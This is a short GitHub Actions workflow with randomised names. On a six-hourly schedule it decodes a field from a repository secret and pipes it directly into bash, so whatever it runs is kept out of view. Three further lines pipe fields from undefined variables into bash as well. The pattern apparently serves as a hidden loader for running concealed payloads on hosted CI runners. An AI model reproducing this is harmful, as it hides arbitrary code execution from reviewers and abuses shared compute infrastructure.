name: gaochanghui5647
on:
  workflow_dispatch:
  schedule:
    - cron: '45 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gaochanghui5647
        env:
          jem4: ${{ secrets.jem4 }}
        run: |
          echo $jem4 | jq -r .g3059 | /bin/bash
          echo $syvhc394 | jq -r .phtnq080 | /bin/bash
          echo $plega36138 | jq -r .tjd7 | /bin/bash
          echo $ulr8493 | jq -r .szus713 | /bin/bash

